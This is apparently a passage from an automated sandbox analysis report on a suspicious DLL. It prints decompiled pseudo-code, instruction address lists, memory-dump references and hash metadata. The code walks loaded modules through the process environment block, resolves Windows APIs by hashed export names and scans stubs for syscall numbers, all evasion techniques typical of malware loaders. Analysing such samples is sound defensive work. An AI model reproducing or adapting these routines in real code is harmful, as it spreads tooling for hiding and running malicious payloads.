													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6ed09377
0x6ed0937b
0x6ed09387
0x6ed0938b
0x6ed0938f
0x6ed09394
0x6ed09397
0x6ed09399
0x6ed0939b
0x6ed0939b
0x6ed0939e
0x6ed093a4
0x6ed0941c
0x6ed09420
0x6ed09423
0x6ed09423
0x6ed09426
0x00000000
0x6ed09426
0x6ed093ab
0x6ed09413
0x6ed09417
0x00000000
0x6ed09417
0x6ed093b2
0x6ed0940b
0x6ed0940e
0x00000000
0x6ed0940e
0x6ed093b7
0x6ed093f5
0x6ed093fc
0x6ed093ff
0x6ed093c8
0x6ed093c8
0x6ed093ce
0x00000000
0x00000000
0x6ed093d3
0x6ed093ed
0x6ed093f0
0x00000000
0x6ed093f0
0x6ed093d8
0x00000000
0x6ed093da
0x6ed093de
0x6ed093e1
0x00000000
0x6ed093e1
0x6ed093d8
0x6ed09429
0x6ed09429
0x6ed09429
0x6ed09432
0x6ed0943b
0x6ed0943e
0x6ed09441
0x6ed09444
0x6ed09447
0x6ed0944d
0x6ed0948f
0x6ed09492
0x6ed09493
0x6ed0949a
0x6ed0949d
0x6ed0944f
0x6ed09453
0x6ed0945d
0x6ed09464
0x6ed09466
0x6ed0947f
0x6ed09482
0x6ed09482
0x6ed09464
0x6ed094a5
0x6ed094a8
0x6ed094ab
0x6ed094af
0x6ed094b3
0x6ed094bd
0x6ed094c1
0x6ed094cb
0x6ed094d4
0x6ed094e1
0x6ed094e4
0x6ed094e7
0x6ed094e7
0x6ed094f3
0x6ed094fe
0x6ed09504
0x6ed09508
0x6ed094f5
0x6ed094f5
0x6ed094f5
0x6ed09510
0x6ed0953a
0x6ed09540
0x6ed09540
0x6ed09548
0x6ed098f1
0x6ed098f7
0x6ed098fd
0x6ed098fd
0x00000000
0x6ed0954e
0x6ed0954e
0x6ed09552
0x6ed09555
0x6ed09558
0x6ed0955b
0x6ed0955f
0x6ed09561
0x6ed09564
0x6ed09567
0x6ed0956b
0x6ed09570
0x6ed09573
0x6ed09577
0x6ed0957c
0x6ed0957f
0x6ed09581
0x6ed09584
0x6ed09588
0x6ed0958d
0x6ed0959d
0x6ed095a3
0x6ed095a3
0x6ed095ab
0x6ed095ad
0x6ed095b6
0x6ed095b8
0x6ed095bb
0x6ed095c6
0x6ed095f3
0x6ed095c8
0x6ed095df
0x6ed095df
0x6ed095fb
0x6ed09601
0x6ed09607
0x6ed09607
0x6ed095fb
0x6ed095b6
0x6ed0960e
0x6ed0967f
0x6ed09684
0x6ed096dd
0x6ed0979f
0x6ed097a4
0x6ed097b3
0x6ed097b9
0x6ed097bd
0x6ed097c6
0x6ed097cd
0x6ed097d6
0x6ed097e4
0x6ed097e7
0x6ed097cf
0x6ed097cf
0x6ed097cf
0x6ed097cd
0x6ed097f0
0x6ed0981d
0x6ed09830
0x6ed09838
0x6ed0981f
0x6ed09821
0x6ed09829
0x6ed09829
0x6ed097f2
0x6ed097f7
0x6ed09816
0x6ed097f9
0x6ed097fe
0x6ed0980f
0x6ed09800
0x6ed09800
0x6ed09800
0x6ed097fe
0x6ed097f7
0x6ed09840
0x6ed0984f
0x6ed0985c
0x6ed09865
0x6ed09869
0x6ed0986d
0x6ed09870
0x6ed09873
0x6ed09876
0x6ed09879
0x6ed0987c
0x6ed09882
0x6ed09886
0x6ed0988c
0x6ed0988c
0x6ed09882
0x6ed09892
0x6ed098cf
0x6ed098d3
0x6ed098da
0x6ed098e0
0x6ed09894
0x6ed09897
0x6ed098b7
0x6ed098bb
0x6ed098c2
0x6ed098c9
0x6ed09899
0x6ed0989c
0x6ed0989e
0x6ed098a2
0x6ed098ac
0x6ed098b2
0x6ed098b2
0x6ed0989c
0x6ed09897
0x6ed098e7
0x6ed098e7
0x6ed09900
0x6ed09900
0x6ed09906
0x6ed0990b
0x6ed09965
0x6ed0996a
0x6ed099a9
0x6ed099ae
0x6ed099b0
0x6ed099b4
0x6ed099b7
0x6ed099ba
0x6ed099bc
0x6ed099bd
0x6ed099bd
0x6ed099c2
0x6ed099e0
0x6ed099e2
0x6ed099e6
0x6ed099ec
0x6ed099ef
0x6ed099f1
0x6ed099f2
0x6ed099f2
0x00000000
0x6ed099c4
0x6ed099c4
0x6ed099c4
0x6ed099c8
0x6ed099ce
0x6ed099d1
0x6ed099d3
0x6ed099d6
0x6ed099f5
0x6ed099f5
0x6ed099fc
0x6ed09a16
0x6ed099fe
0x6ed099fe
0x6ed09a0a
0x6ed09a0b
0x6ed09a0e
0x6ed09a0e
0x6ed09a24
0x6ed09a24
0x6ed099c2
0x6ed0996f
0x6ed0997d
0x6ed09995
0x6ed09999
0x6ed0999c
0x6ed099a2
0x6ed099a6
0x6ed099a6
0x00000000
0x6ed099a6
0x6ed0997f
0x6ed09983
0x6ed09989
0x6ed09989
0x6ed0998f
0x00000000
0x6ed0998f
0x6ed09971
0x6ed09975
0x00000000
0x6ed09975
0x6ed0990f
0x6ed0993b
0x6ed09953
0x6ed09957
0x6ed0995a
0x6ed0995d
0x6ed0995f
0x6ed09962
0x6ed0993d
0x6ed0993d
0x6ed09941
0x6ed09944
0x6ed09947
0x6ed0994a
0x6ed0994d
0x6ed0994d
0x00000000
0x6ed0993b
0x6ed09915
0x00000000
0x00000000
0x6ed0991b
0x6ed0991f
0x6ed09925
0x6ed09928
0x6ed0992b
0x6ed0992e
0x00000000
0x6ed0992e
0x6ed097a6
0x6ed097aa
0x6ed097b0
0x00000000
0x6ed097b0
0x6ed096e8
0x6ed096fa
0x6ed096ff
0x6ed0976a
0x00000000
0x00000000
0x6ed09771
0x6ed09797
0x6ed0979b
0x00000000
0x00000000
0x6ed0977a
0x6ed0977f
0x6ed09793
0x00000000
0x00000000
0x00000000
0x6ed09795
0x6ed09786
0x00000000
0x00000000
0x6ed0978b
0x00000000
0x00000000
0x6ed0978d
0x00000000
0x6ed09771
0x6ed09701
0x6ed0970b
0x6ed0971c
0x6ed0971f
0x6ed09722
0x6ed09728
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed0972e
0x6ed0972e
0x6ed0972e
0x6ed09735
0x00000000
0x00000000
0x6ed09737
0x6ed0973a
0x6ed09740
0x00000000
0x00000000
0x00000000
0x6ed09742
0x6ed09744
0x6ed0974d
0x00000000
0x00000000
0x6ed09761
0x00000000
0x00000000
0x00000000
0x6ed09763
0x6ed096ef
0x00000000
0x00000000
0x00000000
0x6ed096f5
0x6ed09689
0x6ed096b8
0x6ed096b9
0x6ed096c2
0x00000000
0x6ed096d3
0x00000000
0x6ed096d3
0x6ed09690
0x6ed09693
0x6ed096a6
0x6ed096a7
0x6ed096ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed09693
0x6ed09689
0x6ed09615
0x6ed09672
0x6ed09676
0x6ed0967c
0x00000000
0x6ed0967c
0x6ed09617
0x6ed0961b
0x6ed09628
0x6ed0962c
0x6ed09642
0x6ed0964a
0x6ed0962e
0x6ed09630
0x6ed0963a
0x6ed0963a
0x6ed09650
0x6ed09659
0x6ed09670
0x00000000
0x00000000
0x00000000
0x6ed09670
0x6ed0965b
0x6ed0965b
0x00000000
0x6ed09650

Strings

, xrefs: 6ED099DB

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 8da060b53c24eb17a38ec970022d1ce7e45d622e58690ea3acabb50fc4f88274
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 0522AD7140839ACFD715CF96C4A136ABBE0BFC6300F08886EE9E54B295D375D985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6ED0143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6ED00304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6ed0d208 == 0 ||  *0x6ed0d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6ED04FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6ed0d2f0 |  *0x6ed0d2f1;
									if(( *0x6ed0d2f0 |  *0x6ed0d2f1) == 0) {
										_t525 =  *0x6ed0d208; // 0x2f11340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6ed0d2f0 = 1;
											_t526 = E6ED0361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6ED01C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6ed0d208 = _t526;
											 *0x6ed0d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6ED0361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6ED01C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6ECFDFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6ECFDFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6ed0d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6ed0d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6ECFE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6ED0306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6ed0d2e4 = 1;
					E6ECFF584( &(_t535[0x38]), 0);
					E6ECFF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6ECFF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6ED0306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6ECFF828( &(_t535[0xc]), E6ECFF4CC( &(_t535[8])) + 0x14);
								_t369 = E6ECFF4BC( &(_t535[0xc]), E6ECFF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6ECFF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6ECFF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6ECFF654( &(_t535[8]));
							E6ECFF654( &(_t535[0x164]));
							E6ECFF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6ECFF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6ED01D34(0x60a28c5c);
							_t290 = E6ED012EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6ED01C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6ECFD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6ED05CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6ED05D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6ED08E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6ECFF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6ECFBB44( &(_t535[0x110]));
							}
							E6ECFCFDC( &(_t535[0x104]));
							E6ECFCFDC(_t518);
							E6ECFCFDC( &(_t535[0x15c]));
							E6ECFCFDC( &(_t535[0x154]));
							E6ED090EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6ECFF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6ED090B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6ECFF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6ECFF4CC( &(_t535[0x44]));
								_t519 =  *(0x6ed0bd40 + _t381 * 4);
								_t531 = E6ED0907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6ED087E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6ECFF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6ECFF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6ECFF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6ECFF828( &(_t535[0x20]), E6ECFF4CC( &(_t535[0x1c])) + 8);
										E6ECFF4BC( &(_t535[0x20]), E6ECFF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6ED0317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6ECFF828( &(_t535[0x48]), _t535[0x70]);
									E6ED0317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6ECFF840( &(_t535[0x44]), _t563);
									E6ECFF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6ED0913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6ED09104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6ECFF654( &(_t535[0x144]));
									E6ECFF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6ed0d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6ECFF654( &(_t535[0x11c]));
							E6ED08E68(_t381,  &(_t535[0xd8]));
							E6ECFF654( &(_t535[0x1c]));
							E6ECFF654( &(_t535[0x44]));
							E6ECFF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6ECFF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6ECFF828( &(_t535[0x38]), E6ECFF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6ECFF4BC( &(_t535[0x38]), E6ECFF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6ECFF4BC( &(_t535[0xc]), _t62);
						_t455 = E6ECFF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6ed01448
0x6ed0144f
0x6ed01452
0x6ed01459
0x6ed01bdb
0x6ed01bdb
0x6ed0145f
0x6ed0146a
0x6ed019a9
0x6ed019ad
0x00000000
0x6ed01c2c
0x6ed019b3
0x6ed019b6
0x6ed019b9
0x6ed019c3
0x6ed019d2
0x6ed019d4
0x6ed019db
0x6ed01bc5
0x6ed01bc7
0x6ed01bca
0x6ed01bce
0x00000000
0x6ed01bce
0x6ed019ea
0x6ed019f5
0x6ed019fc
0x6ed019ff
0x6ed01a01
0x6ed01a04
0x6ed01a07
0x6ed01a0d
0x6ed01a1b
0x6ed01a2b
0x6ed01a50
0x6ed01a61
0x6ed01a64
0x6ed01a66
0x6ed01aca
0x6ed01acd
0x6ed01acd
0x6ed01acf
0x6ed01ad2
0x6ed01ad6
0x6ed01ad6
0x6ed01ada
0x00000000
0x00000000
0x6ed01ae7
0x6ed01aed
0x6ed01b21
0x6ed01b27
0x6ed01b29
0x6ed01bf8
0x6ed01c00
0x6ed01c03
0x6ed01c05
0x6ed01c1c
0x6ed01c1c
0x6ed01c07
0x6ed01c0b
0x6ed01c10
0x6ed01c10
0x6ed01c1e
0x6ed01c24
0x6ed01b43
0x6ed01b43
0x6ed01b45
0x6ed01b45
0x6ed01b47
0x6ed01b47
0x6ed01b4c
0x00000000
0x00000000
0x6ed01b4e
0x6ed01b4f
0x6ed01b52
0x6ed01b55
0x00000000
0x00000000
0x6ed01b61
0x6ed01b64
0x6ed01b66
0x6ed01b7d
0x6ed01b7d
0x6ed01b68
0x6ed01b6c
0x6ed01b71
0x6ed01b71
0x6ed01b8a
0x6ed01b8d
0x6ed01b96
0x6ed01b99
0x6ed01bbc
0x6ed01bc0
0x00000000
0x6ed01bc0
0x6ed01ba1
0x6ed01ba1
0x6ed01bad
0x6ed01bb0
